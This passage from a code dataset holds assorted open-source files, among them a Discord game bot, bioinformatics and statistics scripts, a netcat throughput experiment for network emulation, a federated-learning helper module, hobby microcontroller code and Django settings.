zip(mstrings,colors,names)]\")\n fprint(\" svar = spikevariants.SpikeVariants().init_from_vocs(vocs)\")\n fprint(\" svar.pprint()\")\n\n\nif __name__ == \"__main__\":\n\n import sys\n\n sv = SpikeVariants.default()\n sv.set_refseq(None)\n sv.check() ## doesn't make sense without refseq!!\n sv.pprint(file=sys.stderr)\n\n sv = SpikeVariants.from_colormut(\"color-mutation-table-v4.txt\")\n sv.set_refseq(None)\n sv.check()\n sv.pprint(file=sys.stderr)\n\n sv.key_print(2,file=sys.stderr)\n\n sv.pyprint(sys.stdout)\n","repo_name":"jt-lanl/cov-voc","sub_path":"spikevariants.py","file_name":"spikevariants.py","file_ext":"py","file_size_in_byte":12209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"75229611394","text":"\nimport pandas as pd\nimport numpy as np\nimport argparse\n\n\ndef load_dfs(tsv_paths):\n\n result = [] \n for tsv_p in tsv_paths:\n df = pd.read_csv(tsv_p, sep=\"\\t\")\n df.set_index([\"pA\",\"pB\"], inplace=True)\n result.append(df)\n\n return result \n\n\ndef combine_dfs(df_ls, identifiers, score_cols):\n\n multicolumns = [(col, ident) for col in score_cols for ident in identifiers]\n\n combined = pd.DataFrame(index=df_ls[0].index,\n columns=pd.MultiIndex.from_tuples(multicolumns))\n\n for col in score_cols:\n for (ident, df) in zip(identifiers, df_ls):\n print(\"\\t\", ident)\n combined[(col,ident)] = df[col] \n\n return combined\n\n\ndef compute_z_scores(df, identifiers, z_cols, baseline=\"traditional\"):\n\n for zcol in z_cols:\n for method in identifiers:\n df[(zcol+\"_z\", method)] = (df[(zcol,method)] - df[(zcol,baseline)])/np.sqrt( df[(zcol+\"_var\",method)]/df[(\"pat\",method)] + df[(zcol+\"_var\",baseline)]/df[(\"pat\",baseline)] )\n\n return df\n\n\nif __name__==\"__main__\":\n\n \n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--score_tsvs\", help=\"TSV files containing scores\", 
nargs=\"+\")\n parser.add_argument(\"--identifiers\", help=\"string identifiers of trial designs\", nargs=\"+\")\n parser.add_argument(\"--output_tsv\", type=str, help=\"output TSV file\")\n parser.add_argument(\"--score_cols\", type=str, nargs=\"+\", default=[\"pat\", \"cmh_reject\", \"cmh_reject_h\", \"obf_reject\", \"obf_stopped_early\", \"cmh_2s\", \"nA-nB_norm\", \"nA-nB_norm_h\", \"nA-nB\", \"nA-nB_h\", \"nA-nB_05\", \"nA-nB_95\", \"effect_estimate\", \"effect_bias\", \"effect_bias_h\", \"A_fraction\", \"failures\", \"excess_failures\", \"blocks\", \"first_blocksize\", \"utility_cmh\"])\n parser.add_argument(\"--z_cols\", type=str, nargs=\"+\", default=[\"cmh_reject\", \"excess_failures\", \"nA-nB_norm\", \"utility_cmh\"])\n args = parser.parse_args()\n\n score_cols = args.score_cols + [col+\"_var\" for col in args.z_cols]\n \n dfs = load_dfs(args.score_tsvs)\n\n table = combine_dfs(dfs, args.identifiers, score_cols)\n\n table = compute_z_scores(table, args.identifiers, args.z_cols)\n\n table.to_excel(args.output_tsv) #, sep=\"\\t\", index=True)\n\n","repo_name":"dpmerrell/TrialMDP-analyses","sub_path":"scripts/tabulate_comparisons.py","file_name":"tabulate_comparisons.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23961776523","text":"import asyncio\nimport os\nimport random\nimport string\nfrom threading import Thread\n\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\n\nfrom components.GameSession import GameSession, sessions, sessiontime_decrease\nfrom views.gameplay_view import GameplayView\nfrom views.help_view import HelpView\nfrom views.join_view import JoinView\n\nload_dotenv()\nintents = discord.Intents.default()\nintents.message_content = True\nbot = commands.Bot(command_prefix=\"rush!\", intents=intents, help_command=None)\n\n@bot.event\nasync def on_timeout(message: discord.Message, game):\n await message.edit(embed=game.create_message(), view=GameplayView(game))\n\n@bot.event\nasync def on_session_terminated(u, k, c):\n user = await bot.fetch_user(u)\n await c.delete()\n del sessions[k]\n print(user)\n await user.send(\"Your session was terminated because no one joined\")\n\n\n@bot.event\nasync def on_guild_join(guild: discord.Guild):\n channel = guild.text_channels[0]\n embed = discord.Embed(title=\"Hi! :wave:\",\n description=\"\"\"Thanks for adding me!\n I'm just your friendly discord bot that let's you play this game called **LUCKY RUSH**\n Although that's my main purpose, I have __**MUCH MORE**__ to offer. So type `rush!help` to see all commands\n \"\"\")\n await channel.send(embed=embed)\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n\n\n@bot.event\nasync def on_ready():\n await bot.tree.sync()\n for i in bot.guilds:\n for y in i.text_channels:\n if \"luckyrush\" in y.name:\n await y.delete()\n\n\n@bot.hybrid_command(description=\"Display rules for Lucky Rush\")\nasync def rules(ctx):\n print(\"xxx\")\n embed = discord.Embed(title=\"Rules\", description=\"\"\"\n **GOAL:** Be the first person on the finish line\n\n -----------\n\n The game is divided on rounds. 
In each round you must pick, if\n you want to **CHECK** the luckybox or **PASS** it.\n Each luckybox contains many fortunate (and unfortunate) stuff that can help you win (or lose) the game.\n In rounds 5 and 10, you have to check the box sadly.\n The game is played with 3 other players\n \"\"\", colour=discord.Colour.blue())\n\n embed.set_footer(text=f\"Sent in {int(round(bot.latency, 3) * 1000)}ms\")\n await ctx.send(embed=embed)\n\n\n@bot.hybrid_command(name=\"help\", description=\"View all possible commands\")\nasync def helpme(ctx: discord.TextChannel):\n embed = discord.Embed(title=f\"Help - Page 1\")\n embed.add_field(name=\"help\", value=\"Shows all of commands\", inline=False)\n embed.add_field(name=\"rules\", value=\"Shows rules of the Lucky Rush\", inline=False)\n embed.add_field(name=\"start\", value=\"Starts a new game\", inline=False)\n embed.add_field(name=\"join\", value=\"Join a game via code\", inline=False)\n embed.add_field(name=\"gameopt\", value=\"Set options of the game\", inline=False)\n embed.set_footer(text=\"Prefix: rush!\")\n\n await ctx.send(embed=embed, view=HelpView())\n\n\n@bot.hybrid_command(description=\"Get an invite link (if you couldn't just go to my profile lol)\")\nasync def invite(ctx):\n await ctx.send(\"Here's my invite link: \")\n\n\n@bot.hybrid_command(description=\"Get a link to my github (if you couldn't open my about me section lol)\")\nasync def github(ctx):\n await ctx.send(\"Want to contribute? Sure, here's my github: \")\n\n\n@bot.hybrid_command(description=\"Start a new lobby for Lucky Rush\")\nasync def lobby(ctx):\n code = ''.join(random.choices(string.ascii_lowercase, k=10))\n while True:\n if code in sessions:\n code = ''.join(random.choices(string.ascii_lowercase, k=10))\n else:\n break\n\n embed = discord.Embed(title=\"Waiting for players...\", description=f\"\"\"\n Invite some friends with this code: {code}\n \"\"\")\n embed.colour = discord.Colour.gold()\n\n guild: discord.Guild = ctx.guild\n c = await guild.create_text_channel(f\"luckyrush-{len(sessions)}\")\n sessions[code] = GameSession(bot, ctx.author, guild, c)\n await c.send(embed=embed)\n await c.set_permissions(guild.default_role, overwrite=discord.PermissionOverwrite(\n view_channel=False\n ))\n await c.set_permissions(ctx.author, overwrite=discord.PermissionOverwrite(\n view_channel=True\n ))\n\n\n@bot.hybrid_command(description=\"Join to the Lucky Rush lobby via code\")\nasync def join(ctx):\n await ctx.send(view=JoinView())\n\n\n@bot.hybrid_command(description=\"Leave the lobby you're currently in\")\nasync def leave(ctx):\n for i in sessions.values():\n if ctx.author in i.players:\n await i.leave(ctx.author)\nt = Thread(target=sessiontime_decrease, args=[bot], daemon=True)\nt.start()\nbot.run(os.getenv(\"TOKEN\"))\n\n\n","repo_name":"OvieDev/lucky-rush","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35857311475","text":"from utils.utils import get_tags\n\n\ndef f1_score(tar_path, pre_path, tag, tag_map):\n origin = 0.\n found = 0.\n right = 0.\n for fetch in zip(tar_path, pre_path):\n tar, pre = fetch\n tar_tags = get_tags(tar, tag, tag_map)\n pre_tags = get_tags(pre, tag, tag_map)\n\n origin += len(tar_tags)\n found += len(pre_tags)\n\n for p_tag in pre_tags:\n if p_tag in tar_tags:\n right += 1\n\n recall = 0. if origin == 0 else (right / origin)\n precision = 0. if found == 0 else (right / found)\n f1 = 0. 
if recall + precision == 0 else (2 * precision * recall) / (precision + recall)\n    return recall, precision, f1\n","repo_name":"AlieZVzz/Pytorch_NER_Template","sub_path":"metrics/ner_f1.py","file_name":"ner_f1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14557644124","text":"file = open(\"gra.txt\", \"r\")\r\ntable = []\r\n\r\nimport os\r\n\r\nfor wiersz in file:\r\n    wiersz = wiersz.strip()\r\n    row = []\r\n    for letter in wiersz:\r\n        row.append(letter)\r\n    table.append(row)\r\n\r\n\r\n\r\ndef ile_sasiadow(x, y, table):\r\n    status = \"\"\r\n    if table[y][x] == \"X\":\r\n        status = \"alive\"\r\n    elif table[y][x] == \".\":\r\n        status = \"dead\"\r\n    sasiedzi = 0\r\n    for j in range(y - 1, y + 2):\r\n        word = \"\"\r\n        for i in range(x - 1, x + 2):\r\n            if i == 20 and j == 12:\r\n                word += table[0][0]\r\n                continue\r\n            if i == 20:\r\n                word += table[j][0]\r\n                continue\r\n            if j == 12:\r\n                word += table[0][i]\r\n                continue\r\n\r\n            if i != x or j != y:\r\n                word += table[j][i]\r\n        # print(word)\r\n        for letter in word:\r\n            if letter == \"X\":\r\n                sasiedzi += 1\r\n    return sasiedzi, status\r\n\r\n\r\ndef evolve(table):\r\n    evolution = []\r\n    for i in range(len(table)):\r\n        evo_row = []\r\n        for j in range(len(table[0])):\r\n            # print(table[i][j])\r\n            if ile_sasiadow(j, i, table)[1] == \"alive\" and ile_sasiadow(j, i, table)[0] in (2, 3):\r\n                evo_row.append(\"X\")\r\n                continue\r\n            elif ile_sasiadow(j, i, table)[1] == \"dead\" and ile_sasiadow(j, i, table)[0] == 3:\r\n                evo_row.append(\"X\")\r\n                continue\r\n            else:\r\n                evo_row.append(\".\")\r\n        evolution.append(evo_row)\r\n\r\n    return evolution\r\n\r\n\r\ndef clear_screen():\r\n    # clears the console so each generation is redrawn in place\r\n    os.system(\"cls\" if os.name == \"nt\" else \"clear\")\r\n\r\n\r\nfor i in range(2, 100):\r\n    print(\"Pokolenie\", i)\r\n    table = evolve(table)\r\n    for row in table:\r\n        print(row)\r\n    clear_screen()\r\n\r\nimport sys, pygame\r\n\r\nsize = width, height = 401,401\r\nblack = 0,0,0\r\nwhite = 200,200,200\r\n\r\nscreen = pygame.display.set_mode(size)\r\nblock_size = 2\r\ngameLoop = True\r\ntab = [[\"\" for i in range(20)] for j in range(20)]\r\nfor x in tab:\r\n    print(x)\r\nwhile gameLoop:\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            sys.exit()\r\n\r\n    j = 1\r\n    for y in tab:\r\n        i = 1\r\n        for x in y:\r\n            pygame.draw.rect(screen, white, [i, j, 19, 19])\r\n            i += 20\r\n        j +=20\r\n    pygame.display.flip()\r\n\r\n\r\n","repo_name":"artpods56/Matura-Informatyka-Python","sub_path":"2016 Maj - Stare Rozszerzenie/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14883892645","text":"from core.experiment import Experiment, ExperimentParameter\n\n\"\"\"\nShould be the mother of ExperimentNCPV, shame on me, should rewrite\nExperimentNCPV as daughter class of this one.\n\"\"\"\n\nclass NCParameter(ExperimentParameter):\n    DD_IBS = \"ddIBS\"\n    DD_OBS = \"ddOBS\"\n    DD_COUNT = \"ddCount\"\n    SERVER_PORT = \"ncServerPort\"\n    CLIENT_PORT = \"ncClientPort\"\n\n    def __init__(self, experiment_parameter_filename):\n        super(NCParameter, self).__init__(experiment_parameter_filename)\n        self.default_parameters.update({\n            NCParameter.DD_IBS: \"1k\",\n            NCParameter.DD_OBS: \"1k\",\n            NCParameter.DD_COUNT: \"5000\", #5k * 1k = 5m\n            NCParameter.SERVER_PORT: \"33666\",\n            NCParameter.CLIENT_PORT: \"33555\",\n        })\n    \n\nclass NC(Experiment):\n    NAME = \"nc\"\n    PARAMETER_CLASS = NCParameter\n\n    SERVER_NC_LOG = \"netcat_server\"\n    CLIENT_NC_LOG = 
\"netcat_client\"\n NC_BIN = \"netcat\"\n\n def __init__(self, experiment_parameter_filename, topo, topo_config):\n super(NC, self).__init__(experiment_parameter_filename, topo, topo_config)\n self.load_parameters()\n \n def load_parameters(self):\n self.ddibs = self.experiment_parameter.get(NCParameter.DD_IBS)\n self.ddobs = self.experiment_parameter.get(NCParameter.DD_OBS)\n self.ddcount = self.experiment_parameter.get(NCParameter.DD_COUNT)\n self.ncServerPort = self.experiment_parameter.get(NCParameter.SERVER_PORT)\n self.ncClientPort = []\n for k in sorted(self.experiment_parameter.paramDic):\n if k.startswith(NCParameter.CLIENT_PORT):\n port = self.experiment_parameter.paramDic[k]\n self.ncClientPort.append(port)\n if len(self.ncClientPort) == 0:\n d = self.experiment_parameter.get(NCParameter.CLIENT_PORT)\n self.ncClientPort.append(d)\n\n def prepare(self):\n super(NC, self).prepare()\n self.topo.command_to(self.topo_config.client, \"rm \" + \\\n NC.CLIENT_NC_LOG )\n self.topo.command_to(self.topo_config.server, \"rm \" + \\\n NC.SERVER_NC_LOG )\n\n def getNCServerCmd(self, id):\n s = \"dd if=/dev/urandom ibs=\" + self.ddibs + \\\n \" obs=\" + self.ddobs + \\\n \" count=\" + self.ddcount + \\\n \" | \" + \\\n NC.NC_BIN + \\\n \" -l \" + self.ncServerPort + \\\n \" &>\" + NC.SERVER_NC_LOG + \\\n \"_\" + str(id) + \".log\"\n print(s)\n return s\n\n def getNCClientCmd(self, id):\n s = NC.NC_BIN + \" \" + \\\n \" -p \" + self.ncClientPort[id] + \" \" + \\\n self.topo_config.get_server_ip() + \" \" + \\\n self.ncServerPort + \" \" + \\\n \"&>\" + NC.CLIENT_NC_LOG + \\\n \"_\" + str(id) + \".log\"\n print(s)\n return s\n\n def clean(self):\n super(NC, self).clean()\n self.topo.command_to(self.topo_config.server, \"killall netcat\")\n\n def run(self):\n for i in range(0, len(self.ncClientPort)):\n cmd = self.getNCServerCmd(i)\n self.topo_config.server.sendCmd(cmd)\n \n cmd = self.getNCClientCmd(i)\n self.topo.command_to(self.topo_config.client, cmd)\n\n self.topo_config.server.waitOutput()\n \n self.topo.command_to(self.topo_config.client, \"sleep 1\")\n\n","repo_name":"qdeconinck/minitopo","sub_path":"experiments/nc.py","file_name":"nc.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"28529681541","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests for the segmentation subpackage.\"\"\"\n\n# import nose\nimport tests.testhelper as testhelper\n\n# hwrt modules\nimport hwrt.segmentation as segmentation\n# import hwrt.utils as utils\n\n\n# Tests\ndef prepare_beams():\n \"\"\"\n Prepare one beam object for each recording.\n\n Returns\n -------\n list\n A list of beam objects\n \"\"\"\n beams = []\n hwrs = testhelper.get_all_symbols_as_handwriting()\n for hwr in hwrs:\n beam = segmentation.Beam()\n for stroke in hwr.get_sorted_pointlist():\n beam.add_stroke(stroke)\n beams.append(beam)\n return beams\n\n\ndef get_results_test():\n \"\"\"Test the .get_results() method of beam objects.\"\"\"\n beams = prepare_beams()\n for beam in beams:\n beam.get_results()\n\n\ndef get_writemath_results_test():\n \"\"\"Test the .get_writemath_results method of beam objects.\"\"\"\n beams = prepare_beams()\n for beam in beams:\n beam.get_writemath_results()\n\n\n# def p_strokes_test():\n# nose.tools.assert_greater_equal(1.0, segmentation.p_strokes('A', 3))\n# nose.tools.assert_greater_equal(segmentation.p_strokes('A', 3), 
0.0)\n","repo_name":"all3xfx/hwrt","sub_path":"tests/segmentation_test.py","file_name":"segmentation_test.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"2591154784","text":"import numpy as np\n\ntribit_mgd_map = {\n 0: 0,\n 1: 1,\n 2: 3,\n 3: 2,\n 4: 7,\n 5: 6,\n 6: 4,\n 7: 5\n}\n\ndibit_mgd_map = {\n 0: 0,\n 1: 1,\n 2: 3,\n 3: 2\n}\n\n\ndef MGD_Decode(indata: np.ndarray, Bd: int = 75, frqmode: str = \"fixed\") -> np.ndarray:\n # Convert the input bitgroups to their Gray form, so that\n # receive errors only result in one bit in err.\n\n if ((Bd == 75 and frqmode == 'fixed') or Bd == 1200):\n grouped = np.zeros([indata.shape[0]//2,], dtype=int)\n for i in range(0, len(indata), 2):\n grouped[i//2] = int(str(indata[i]) + str(indata[i+1]), base=2)\n out = np.zeros(grouped.shape, dtype=int)\n for i, el in enumerate(grouped):\n out[i] = dibit_mgd_map[el]\n return out\n\n elif (Bd == 150 or Bd == 300 or Bd == 600 or (Bd == 75 and frqmode == 'hopping')):\n return indata\n\n elif (Bd == 2400 or Bd == 4800):\n grouped = np.zeros([indata.shape[0]//3,], dtype=int)\n for i in range(0, len(indata), 3):\n grouped[i//3] = int(str(indata[i]) +\n str(indata[i+1]) + str(indata[i+2]), base=2)\n out = np.zeros(grouped.shape, dtype=int)\n for i, el in enumerate(grouped):\n out[i] = tribit_mgd_map[el]\n return out\n else:\n raise RuntimeError(\"Invalid input.\")\n","repo_name":"Willt125/MIL-STD-188-110C","sub_path":"MGDDecode.py","file_name":"MGDDecode.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"24962830432","text":"import pytest\nimport json\nfrom aiohttp import web\nfrom aiohttp.test_utils import TestClient\nfrom yarl import URL\nfrom app.core import SessionMaker\nfrom app.schemas import VacancyRequest\n\n\nasync def hhru_vacancy(request: web.Request) -> web.Response:\n \"\"\"Mock hhru vacancy response\n \"\"\"\n with open('./tests/core/vac_resp.json', 'r') as f:\n data = json.loads(f.read())\n return web.Response(text=json.dumps(\n data, ensure_ascii=False), content_type='application/json'\n )\n\n\n@pytest.fixture\ndef urls() -> dict[str, str]:\n \"\"\"Urls for request\n\n Returns:\n dict[str, str]: dict with urls\n \"\"\"\n urls = {\n 'hhru_vacancy': str(URL.build(\n path='/vacancies',\n query=VacancyRequest.Config.schema_extra['example']\n ),\n )}\n return urls\n\n\n@pytest.fixture\ndef client(loop, aiohttp_client) -> TestClient:\n \"\"\"Make a test client\n \"\"\"\n app = web.Application()\n app.router.add_routes([\n web.get('/vacancies', hhru_vacancy),\n ])\n client = loop.run_until_complete(aiohttp_client(app))\n return client\n\n\n@pytest.fixture\ndef session(client: TestClient) -> SessionMaker:\n \"\"\"Make test session\n \"\"\"\n SessionMaker.aiohttp_client = client\n session = SessionMaker()\n return session\n","repo_name":"KonstantinKlepikov/wzzzz","sub_path":"api/app/tests/core/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19192169737","text":"import PyIgnition\n\n\nclass FXFire(object):\n def __init__(self, game):\n self.game = game\n self.fire = PyIgnition.ParticleEffect(game.screen, (0, 0), (800, 600))\n self.source = self.fire.CreateSource((300, 500), initspeed=2.0, initdirection=90.0, initspeedrandrange=0.1,\n initdirectionrandrange=0.5, 
particlesperframe=3, particlelife=100,\n drawtype=PyIgnition.DRAWTYPE_CIRCLE, colour=(255, 200, 100), radius=3.0)\n self.source.CreateParticleKeyframe(10, colour=(200, 50, 20), radius=1.0, length=1)\n\n self.moving = False\n self.target_coords = None\n\n @property\n def coords(self):\n return self.source.pos\n\n @property\n def y(self):\n return self.source.pos[1]\n\n @property\n def x(self):\n return self.source.pos[0]\n\n def move(self, start, end):\n self.moving = True\n self.source.SetPos(start)\n self.source.pos = start\n self.target_coords = end\n\n def update(self):\n # Particle effects\n if self.source.curframe % 30 == 0:\n self.source.ConsolidateKeyframes()\n self.fire.Update()\n self.fire.Redraw()\n\n if self.moving:\n dx, dy = (self.target_coords[0] - self.x, self.target_coords[1] - self.y)\n stepx, stepy = (dx / 50., dy / 50.)\n self.source.SetPos((self.x + stepx, self.y + stepy))","repo_name":"leifktaylor/modeling","sub_path":"little/particles/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1857599985","text":"from typing import Union, Generator\nimport numpy as np\nfrom collections import Counter\n\nimport torch\n\nfrom dl.data.dataProvider import get_data_loaders, get_data_loader\nfrom dl.data.datasets import get_data\nfrom dl.data.samplers import dataset_user_indices, specify_class_simple\nfrom env.running_env import args\n\n\ndef deepcopy_dict(ori_dict: Union[dict, Generator]):\n generator = ori_dict.items() if isinstance(ori_dict, dict) else ori_dict\n copy_dict = dict()\n for key, param in generator:\n copy_dict[key] = param.clone()\n return copy_dict\n\n\ndef disp_num_params(model):\n total_param_in_use = 0\n total_all_param = 0\n for layer, layer_prefix in zip(model.prunable_layers, model.prunable_layer_prefixes):\n layer_param_in_use = layer.num_weight\n layer_all_param = layer.mask.nelement()\n total_param_in_use += layer_param_in_use\n total_all_param += layer_all_param\n print(\"{} remaining: {}/{} = {}\".format(layer_prefix, layer_param_in_use, layer_all_param,\n layer_param_in_use / layer_all_param))\n print(\"Total: {}/{} = {}\".format(total_param_in_use, total_all_param, total_param_in_use / total_all_param))\n return total_param_in_use / total_all_param\n\n\n# 计算总数据集的各分类分布\ndef dataset_dist() -> (np.ndarray, torch.Tensor):\n targets = np.array(get_data(args.dataset, \"train\").targets)\n total_num = len(targets)\n total_cnt = Counter(targets)\n global_dist = torch.tensor([total_cnt[cls] / total_num if cls in total_cnt else 0.00\n for cls in range(args.num_classes)])\n return targets, global_dist\n\n\ndef max_class(client_cnt: Counter) -> int:\n base_class = 0\n max_cnt = -1\n for cls in range(args.num_classes):\n if client_cnt[cls] > max_cnt:\n base_class = cls\n max_cnt = client_cnt[cls]\n return base_class\n\n\ndef simulation_federal_process():\n user_dict = dataset_user_indices(args.dataset, args.workers, args.non_iid)\n workers_loaders = get_data_loaders(args.dataset, data_type=\"train\", batch_size=args.batch_size,\n users_indices=user_dict, num_workers=0, pin_memory=False)\n test_loader = get_data_loader(args.dataset, data_type=\"test\", batch_size=args.batch_size,\n shuffle=True, num_workers=0, pin_memory=False)\n return test_loader, workers_loaders, user_dict\n\n\ndef get_data_ratio(user_dict: dict):\n ratios_list = []\n sorted_cid = sorted(user_dict.keys())\n targets, global_dist = dataset_dist()\n\n for client_id in 
sorted_cid:\n indices = user_dict[client_id]\n client_targets = targets[indices]\n client_sample_num = len(indices)\n client_target_cnt = Counter(client_targets)\n\n ratio = torch.tensor([client_target_cnt[cls] / client_sample_num if cls in client_target_cnt else 0.00\n for cls in range(args.num_classes)])\n ratios_list.append(ratio)\n return global_dist, ratios_list\n","repo_name":"Wolfsion/FedLA","sub_path":"federal/federal_util.py","file_name":"federal_util.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5092787537","text":"from operator import add, mul, sub\n\nsquare = lambda x: x * x\n\nidentity = lambda x: x\n\ntriple = lambda x: 3 * x\n\nincrement = lambda x: x + 1\n\ndef accumulate(combiner, base, n, term):\n while n > 0:\n base = combiner(base, term(n))\n n = n - 1\n return base\n\ndef compose1(f, g):\n \"\"\"Return a function h, such that h(x) = f(g(x)).\"\"\"\n def h(x):\n return f(g(x))\n return h\n\n\ndef make_repeater(f, n):\n \"\"\"Return the function that computes the nth application of f.\n\n >>> add_three = make_repeater(increment, 3)\n >>> add_three(5)\n 8\n >>> make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3 * 3 * 1\n 243\n >>> make_repeater(square, 2)(5) # square(square(5))\n 625\n >>> make_repeater(square, 4)(5) # square(square(square(square(5))))\n 152587890625\n >>> make_repeater(square, 0)(5) # Yes, it makes sense to apply the function zero times!\n 5\n \"\"\"\n return accumulate(compose1, lambda x : x, n, lambda x : f)\n\n\ndef take_turn(num_rolls, opponent_score, dice=six_sided):\n \"\"\"Simulate a turn rolling NUM_ROLLS dice, which may be 0 (Free Bacon).\n Return the points scored for the turn by the current player.\n\n num_rolls: The number of dice rolls that will be made.\n opponent_score: The total score of the opponent.\n dice: A function that simulates a single dice roll outcome.\n \"\"\"\n # Leave these assert statements here; they help check for errors.\n assert type(num_rolls) == int, 'num_rolls must be an integer.'\n assert num_rolls >= 0, 'Cannot roll a negative number of dice in take_turn.'\n assert num_rolls <= 10, 'Cannot roll more than 10 dice.'\n assert opponent_score < 100, 'The game should be over.'\n # BEGIN PROBLEM 3\n if num_rolls > 0:\n return roll_dice(num_rolls)\n else:\n return free_bacon(opponent_score)\n # END PROBLEM 3\n\n","repo_name":"AnthonyNg404/61A","sub_path":"hw/hw01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34762387329","text":"import requests\nfasta=requests.get('https://rest.uniprot.org/uniprotkb/A0A060IFB9.fasta').text\nf = open('test.fasta', 'a')\nf.write(fasta)\nf.close()\n#https://bionumpy.github.io/bionumpy/\nimport numpy as np\nimport bionumpy as bnp\nreads = bnp.open('test.fasta').read()\nprint(reads)\ngc_content = np.mean((reads.sequence == \"C\") | (reads.sequence == \"G\"))\nprint(gc_content)\n","repo_name":"animesh/scripts","sub_path":"readFasta.py","file_name":"readFasta.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23876264053","text":"from machine import ADC, Pin\nimport time\n\nred = Pin(18, Pin.OUT)\namber = Pin(19, Pin.OUT)\ngreen = Pin(20, Pin.OUT)\nall_leds = [red, amber, green]\n\nlight_sensor = ADC(Pin(26))\n\n\ndef set_all(leds_to_set, to_set, delay=None, 
reverse_order=False):\n if reverse_order:\n leds_to_set = reversed(leds_to_set)\n\n for led in leds_to_set:\n led.value(to_set)\n if delay:\n time.sleep(delay)\n\n\nwhile True:\n light = light_sensor.read_u16()\n light_percent = round(light/65535*100, 2)\n\n print(f\"{light_percent}%\")\n \n time.sleep(0.5)\n \n if light_percent < 10:\n set_all(all_leds, 0)\n elif light_percent < 30:\n set_all([red], 1)\n set_all([amber, green], 0)\n elif light_percent < 60:\n set_all([red, amber], 1)\n set_all([green], 0)\n else:\n set_all(all_leds, 1)\n","repo_name":"WalternativE/maker_advent_calendar","sub_path":"twelve_days_of_pi/day_06.py","file_name":"day_06.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42715697879","text":"# Django settings for pingismo project.\nimport os\n\nfrom unipath import Path\nimport dj_database_url\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nAUTH_USER_MODEL = 'base.User'\n\n# ADMINS = (\n# # ('Your Name', 'your_email@example.com'),\n# )\n# \n# MANAGERS = ADMINS\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'Asia/Taipei'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = False\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'badcm@4e2rx5m6sq910n9slkdn8#1p!q&mmtz0l1@noxtd38o^'\n\n# List of callables that know how to import templates from various sources.\n#TEMPLATE_LOADERS = (\n# 'django.template.loaders.filesystem.Loader',\n# 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n#)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'allauth.account.context_processors.account',\n 'allauth.socialaccount.context_processors.socialaccount',\n)\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n\n # `allauth` specific authentication methods, such as login by e-mail\n 
